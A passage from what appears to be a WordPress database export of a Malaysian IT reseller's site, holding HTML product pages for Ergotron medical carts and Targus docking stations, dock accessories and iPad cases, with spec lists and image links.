alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Expand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â StyleViewÂ® Telemedicine Cart, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  To discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:43:58','2019-09-26 08:43:58','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3688,1,'2019-10-31 09:04:44','2019-10-31 01:04:44','','Targus','','inherit','closed','closed','','targus-2','','','2019-10-31 09:04:56','2019-10-31 01:04:56','',3683,'https://bintara.com.my/wp-content/uploads/2019/10/Targus.png',0,'attachment','image/png',0),(3686,1,'2019-10-31 08:54:40','2019-10-31 00:54:40','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton 